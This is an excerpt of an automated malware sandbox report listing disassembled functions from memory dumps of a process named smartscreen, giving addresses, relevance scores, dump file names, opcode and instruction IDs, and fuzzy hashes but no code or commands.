                                                          • Opcode Fuzzy Hash: 466cb0dfd31cdd2ff69a819e5121e4aec73a4b2e057cbdccfee80a2d5de4295e
                                                          • Instruction Fuzzy Hash: AFE01A6154E3C08FCB0AEB7488698557F70AE6721078B41DED049CB1B3E62D8949CB01
                                                          Function 00007FFD9B791648 Relevance: .9, Instructions: 915COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b790000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b02c86b3c772d0e1300660f17bd0f615983bc372599fd6d5537c08e26b46c489
                                                          • Instruction ID: a8a23a8736c4c920e176b9336059d6e2d5fb77de37fe54c097b5493312c90f99
                                                          • Opcode Fuzzy Hash: b02c86b3c772d0e1300660f17bd0f615983bc372599fd6d5537c08e26b46c489
                                                          • Instruction Fuzzy Hash: B052B731B19A4E4FEBA8EB5884A56B873D2FF98340F0546B9D01EC36E7DD34AD418781
                                                          Function 00007FFD9B7BD380 Relevance: .8, Instructions: 850COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e2ddac2c36b7b50eb5889333b4ff942a6c7bc9492a2a865cb623a047777325b
                                                          • Instruction ID: edc6b8619f88d5ccaf161a4282893deb94221014ffeb76e7f79b3843167effc9
                                                          • Opcode Fuzzy Hash: 8e2ddac2c36b7b50eb5889333b4ff942a6c7bc9492a2a865cb623a047777325b
                                                          • Instruction Fuzzy Hash: D021F31BA4F2A60EE72577B964B28F83F50CF5223570802F7E19C8E0E3DD08264A8B55
                                                          Function 00007FFD9B790DD6 Relevance: .7, Instructions: 747COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b790000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3218ec305fd3d0a01de564132a38530bbb500258b38cbb1404754e2cfc334528
                                                          • Instruction ID: af07445408f23dd60dc68cd6609a14f4eaecbda657eb47cc17227d5c1da31130
                                                          • Opcode Fuzzy Hash: 3218ec305fd3d0a01de564132a38530bbb500258b38cbb1404754e2cfc334528
                                                          • Instruction Fuzzy Hash: 9C42B631B19A4D4FEBA8EB5884A56B877D2FF98340F0542B9D01DC36A6DE34BD818781
                                                          Function 00007FFD9B791A4E Relevance: .4, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b790000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ceb2de8184bbb76c8a2d81191c415b63f88f9fc25dcd69bb0552f5f34f27161c
                                                          • Instruction ID: a87f43be5823c55f470dc813b8a790beaa9fa245131301b2d2f0d3e8b6931162
                                                          • Opcode Fuzzy Hash: ceb2de8184bbb76c8a2d81191c415b63f88f9fc25dcd69bb0552f5f34f27161c
                                                          • Instruction Fuzzy Hash: FED1E331B19E4E5FEBA8EB6884A56B473D2FF54300F0542B9D05EC35A7DE38B9818781
                                                          Function 00007FFD9B7911CD Relevance: .4, Instructions: 403COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b790000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81b6dd6499bd269637832d286bdb03efda1b1170e6383bfa2909841514de368c
                                                          • Instruction ID: fbfeb24de873e333c2d0be7856fc5dc971856e5eeadd7e52522ccab9d920692c
                                                          • Opcode Fuzzy Hash: 81b6dd6499bd269637832d286bdb03efda1b1170e6383bfa2909841514de368c
                                                          • Instruction Fuzzy Hash: 77D1A521F19A5D5FEBA4FAAC84A577433A2EF98305F054275D40EC36F2DE28BE418781
                                                          Function 00007FFD9B7A99D1 Relevance: .3, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7a4000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f20b4f37404ab88ab23de27a89a031ea9721fb12a7080a5b3e53c3a1457526c
                                                          • Instruction ID: 6cbe02e1ed960aac615ad15771d867dc3d058034af56826ef4ab4527c6ad69ac
                                                          • Opcode Fuzzy Hash: 1f20b4f37404ab88ab23de27a89a031ea9721fb12a7080a5b3e53c3a1457526c
                                                          • Instruction Fuzzy Hash: EAA1A370B1990D8FDB94EB68C4A96B977E1FF58304F5146B9D01EC72E6CE38A841C741
                                                          Function 00007FFD9B7B3C75 Relevance: .3, Instructions: 295COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f87e4e31c1792bcb7d77c454c166bb88ff6d46c247cdf4c4d51406ea6028043e
                                                          • Instruction ID: 96f269a3e52dec1dafdb999df6adbfa562642471fce7eb53746246c99fdd6d95
                                                          • Opcode Fuzzy Hash: f87e4e31c1792bcb7d77c454c166bb88ff6d46c247cdf4c4d51406ea6028043e
                                                          • Instruction Fuzzy Hash: A891D721B1DB5E0FEB98FAA884B66B877D1EF54300F0542BAD40DC31E7DD286D858B91
                                                          Function 00007FFD9B7B8CC5 Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 45418f411babe92681d767915956feead18e491c8f9daddfb3a32e48f2c61ab0
                                                          • Instruction ID: 1e6a267a1aa35b6e48b18c583acb2c0c353dcf9967e9e791593d8341a2cf1589
                                                          • Opcode Fuzzy Hash: 45418f411babe92681d767915956feead18e491c8f9daddfb3a32e48f2c61ab0
                                                          • Instruction Fuzzy Hash: B2514470A19A5D8FEB98EB98C865BACB7E1FF54300F1442B9D01DD32A6DE346D848F41
                                                          Function 00007FFD9B780908 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: 34b20c2f54227a925371e3e52f426af9c15f873fae4c998717b44a7f8a130e19
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: 0521EA3130DD184FE768EA5CE889DB977D1EF9932171501BAE58EC7135E921EC8287C1
                                                          Function 00007FFD9B7B29B0 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6e7d0c36cbac15c4536afb87c67514c668876684cc02293625daadabfe5f058
                                                          • Instruction ID: 88512dc4be3314c9c89c26b773e79b59df5b6415e09fed041b264cbc423db556
                                                          • Opcode Fuzzy Hash: d6e7d0c36cbac15c4536afb87c67514c668876684cc02293625daadabfe5f058
                                                          • Instruction Fuzzy Hash: 3031E422B1EB9A0FE399A6E858B56B47B91AF55300F0902BAD41CC61F3CD182D848B41
                                                          Function 00007FFD9B780998 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d041e439a231264497affbbb514daa67d6c0ac16fe8320558fe1e632edf41372
                                                          • Instruction ID: 3ac7bb6d99952755ea4d940b12fa1cdbb371838b1777ac125cbb46c7e27c1670
                                                          • Opcode Fuzzy Hash: d041e439a231264497affbbb514daa67d6c0ac16fe8320558fe1e632edf41372
                                                          • Instruction Fuzzy Hash: 1821FD20B19E1D0FE794F66C94AE67972C2EB98316F5141B9E40EC33F6DD38AC418245
                                                          Function 00007FFD9B7B2AE2 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05d5dbf52502b06a3c602f185ef6e80c14c17164600e23713987a345a41849d9
                                                          • Instruction ID: 151e4b0beb62ad0b5b050ebe7d18e882e0a954ca63b835e13d615005b0d029b4
                                                          • Opcode Fuzzy Hash: 05d5dbf52502b06a3c602f185ef6e80c14c17164600e23713987a345a41849d9
                                                          • Instruction Fuzzy Hash: 1D31D521B1EB9E4FE7A5ABE458A96B97A91EF44300F0502BAD81DC20F3DD286D448B41
                                                          Function 00007FFD9B7BD2D0 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8049f2d8f73606f1d1be9897cb76ffd656f0dcad911b8940cbb84486c76e6d42
                                                          • Instruction ID: 771995d3e838a8950de9fd3312a86624bd3ba711e40c8db3f1c2ff635c3e4183
                                                          • Opcode Fuzzy Hash: 8049f2d8f73606f1d1be9897cb76ffd656f0dcad911b8940cbb84486c76e6d42
                                                          • Instruction Fuzzy Hash: 4321D732F05A2D4BFB60DA5CD8647EA73E2EB84310F020276E419E72A4DE346D418F80
                                                          Function 00007FFD9B7941B1 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b790000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78286710d2109668b93864f9ba1f73995eb0cbf50fe8b64484a9c6b12b57463b
                                                          • Instruction ID: 292b6adbefae0d9cf190d0caafde2971ec1dbaf003d9e75a148f806767fcbb03
                                                          • Opcode Fuzzy Hash: 78286710d2109668b93864f9ba1f73995eb0cbf50fe8b64484a9c6b12b57463b
                                                          • Instruction Fuzzy Hash: 70215E70E1965E8EEB749BE488656BE7BB1FF50300F11067EC026D72E6DF786A058B40
                                                          Function 00007FFD9B780C25 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81430c1ed3d5fba02304d1331be77d97815382da6fce95d38473287031a63478
                                                          • Instruction ID: 05776b5ab7812e7d16d24da183c7835101961520b1d547fd12a37d8dfc5a8032
                                                          • Opcode Fuzzy Hash: 81430c1ed3d5fba02304d1331be77d97815382da6fce95d38473287031a63478
                                                          • Instruction Fuzzy Hash: 0E21B935B0EB8D8FE721DBA888A51EC7FA0EF52315F1542FBD055871F2DA3826458741
                                                          Function 00007FFD9B784C28 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89ff0e0e47d14d8e1a5764c4221d0d45fa824f228dfa4e40059919c1b0c5e734
                                                          • Instruction ID: 35049095326d70aa496512f96236bbc9a552cd8c090ee5ce5bde88481f679557
                                                          • Opcode Fuzzy Hash: 89ff0e0e47d14d8e1a5764c4221d0d45fa824f228dfa4e40059919c1b0c5e734
                                                          • Instruction Fuzzy Hash: 50215E21B19E1E4FE7B4E75888B96B87392FF84311F1602B9E40ED76F2DE386E414640
                                                          Function 00007FFD9B7B2CA5 Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1b4e0ee7951fdc6aa86af9bda1eaf9afc2d4a9c033f9663802f045f16066089
                                                          • Instruction ID: 0029b46db328afb4bdfa5973ca95df04c69fcbeddab22fd5c4515a531802a66b
                                                          • Opcode Fuzzy Hash: e1b4e0ee7951fdc6aa86af9bda1eaf9afc2d4a9c033f9663802f045f16066089
                                                          • Instruction Fuzzy Hash: 61219631B0EA2E4FE794EB98D4647A43791EB55710F050679D41DD72EACE287D418F80
                                                          Function 00007FFD9B782BF9 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: efd2c2f995a0dd7eccbf7cd241fcfd33cef35fd785eeba5251628edc4a7aeee2
                                                          • Instruction ID: 8ab4e5a81bf5f660d52921c7704ca58c3be4052d03448fc9c7f6d4a1ceeb1b62
                                                          • Opcode Fuzzy Hash: efd2c2f995a0dd7eccbf7cd241fcfd33cef35fd785eeba5251628edc4a7aeee2
                                                          • Instruction Fuzzy Hash: D0115730B09E0DCFDB64EB48C494BA973E1FB98305F5142A9D04ED72B5CA38AA808B45
                                                          Function 00007FFD9B784D1E Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c0e7302252a2634fc998e7394e1dbf4f08b1f72595603214b53fbfb1d9ad9e1
                                                          • Instruction ID: fd01b24cb407dfc5d7640c2717112a364d67733803710e3d2f9b09cf31ce461a
                                                          • Opcode Fuzzy Hash: 9c0e7302252a2634fc998e7394e1dbf4f08b1f72595603214b53fbfb1d9ad9e1
                                                          • Instruction Fuzzy Hash: 2A110321B09E0D4BEBA4E66888E96B873E2FF94342F1701BDD00ED72F2DD786A414604
                                                          Function 00007FFD9B780C38 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb0da6a46d4b284f971977a24772ad0f3cf71952490efb496d7a76abeeff8f5f
                                                          • Instruction ID: 2e38703c29142a61fa252b8a39681d6c79e9074dc4c8b36c25cb3b1b83aa0859
                                                          • Opcode Fuzzy Hash: bb0da6a46d4b284f971977a24772ad0f3cf71952490efb496d7a76abeeff8f5f
                                                          • Instruction Fuzzy Hash: F4118635B0EB8D8FE712DB6898A51EC7FB0EF52211F1646F7C484DB1E2D93416498781
                                                          Function 00007FFD9B7B7438 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19db932d4f1c2bbe0a0808931d93862589bcb9a27b90fd838e650ab4f23d014b
                                                          • Instruction ID: 4e4392fc96fbcd619fc3fb2976a3f1c39e4370241dca250fbd9c1ea120ce8e0e
                                                          • Opcode Fuzzy Hash: 19db932d4f1c2bbe0a0808931d93862589bcb9a27b90fd838e650ab4f23d014b
                                                          • Instruction Fuzzy Hash: 34F0F42BA4D2914ED709B27C74B28FC7F918F5223974881FBE09D8E4E7CD0994898A85
                                                          Function 00007FFD9B7ACA56 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7a4000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction ID: 73a94d5e0ffa73a9c18385e28098f995084bfa180df6cf0793deee9320a8a679
                                                          • Opcode Fuzzy Hash: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction Fuzzy Hash: ED019675A1CB888FD7A4DF18844572AB7E2FBA8315F114A2EA09DD3660DB30A8018B42
                                                          Function 00007FFD9B780C40 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23a8a7d32beeb55120a499870c0f04a1bd7d4f728746e43c8beaf3061e686c84
                                                          • Instruction ID: 7e7458c80985b8e4f0945d7dbd4c815da9c231f5767b950c77639bed8fac47bf
                                                          • Opcode Fuzzy Hash: 23a8a7d32beeb55120a499870c0f04a1bd7d4f728746e43c8beaf3061e686c84
                                                          • Instruction Fuzzy Hash: E9016135A0EB8C8FE712DB6488A41DDBFB0EF52211F1646EBC485DB1E2DA3456498B81
                                                          Function 00007FFD9B784CE3 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: 5f4a9e9009faadc229a886ba962064a22a19c0a60235ae16323da3e99fa88289
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 68F03630B19D1D8EEB64EA54D8E56F873A1FF54312F1601FDD00ED36B1DD786A814A04
                                                          Function 00007FFD9B7BB5CD Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22ce549bbfd7c800b6d17687c66b772ff1afef4bbaee5eb64470807c5b49c2df
                                                          • Instruction ID: 9fded2165a8ee09850ed128bf77fbd31f66c5331c0a01e8dd1c81888c302fced
                                                          • Opcode Fuzzy Hash: 22ce549bbfd7c800b6d17687c66b772ff1afef4bbaee5eb64470807c5b49c2df
                                                          • Instruction Fuzzy Hash: 9BF0B461B0AA1E4FEA98FB9844EA7F476C2EF58304F140235D41DC26B3DE282C804F42
                                                          Function 00007FFD9B780C50 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27204e0678c9fe9de8d125915eb7b8bb1059bd83c89202b1961172c7450f7150
                                                          • Instruction ID: 00bbdaf113da6d1a47c76f7260f8b7c5db667e7490eae7c43f01a6ee9f3c926f
                                                          • Opcode Fuzzy Hash: 27204e0678c9fe9de8d125915eb7b8bb1059bd83c89202b1961172c7450f7150
                                                          • Instruction Fuzzy Hash: 84018434A0D7888FD722DB6484A41DDBFB0EF02315F1542EBC484CB1E2D9345644C741
                                                          Function 00007FFD9B7BAE89 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b99941d558667ae4b3966f44dc7deab78d51fbb592e1f293feeb77f820a8f7ea
                                                          • Instruction ID: 095341d49bdc517e12f42d9926f58df8dc460d3c7089602cac90db1005407e46
                                                          • Opcode Fuzzy Hash: b99941d558667ae4b3966f44dc7deab78d51fbb592e1f293feeb77f820a8f7ea
                                                          • Instruction Fuzzy Hash: 4DF0E531B1C7880FC7199A2958A54A17BF1DF5B20534A42FFD49ACB2E3DD28AC458741
                                                          Function 00007FFD9B7B37A9 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f15983fc7a475cccc271237704d63c895e45690ff786fac8de0724e410e80734
                                                          • Instruction ID: 2ac05bfdfb2c12131e8a4d3fd080bda2b2c37ab6d76c7dcffcc253080c5b1923
                                                          • Opcode Fuzzy Hash: f15983fc7a475cccc271237704d63c895e45690ff786fac8de0724e410e80734
                                                          • Instruction Fuzzy Hash: 7BE09230B09B884FCB0E9A29886C4607BA1EF6611278942FFC405CB1A3ED29DC84CB41
                                                          Function 00007FFD9B7B2529 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e068ef4d23bd457f8cda16b2c8bcecf64da4f460d9fddb2d52e8c7a4cf8f1072
                                                          • Instruction ID: fd3870ddbc990059cf26fb1951a14564975488d416f3da713d870f96bf3656eb
                                                          • Opcode Fuzzy Hash: e068ef4d23bd457f8cda16b2c8bcecf64da4f460d9fddb2d52e8c7a4cf8f1072
                                                          • Instruction Fuzzy Hash: 27E09B30B597844FC70A963848654607BA1EF5710178951FFC445CB1D3DD18DC85C741
                                                          Function 00007FFD9B794B69 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b790000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8475a065b3c08e857988ed0829737e564aeed36e7693f0b6b3802dd43ee8f93
                                                          • Instruction ID: 42702fd2c7704eb7062352aa81eadd4e1feba344382271bce9163e83f766a4a7
                                                          • Opcode Fuzzy Hash: e8475a065b3c08e857988ed0829737e564aeed36e7693f0b6b3802dd43ee8f93
                                                          • Instruction Fuzzy Hash: B7F0A031B0D60E8FFA38AA48D4A06B87261EB41311F1243B9D41EC31F6DE39AA028680
                                                          Function 00007FFD9B78560A Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
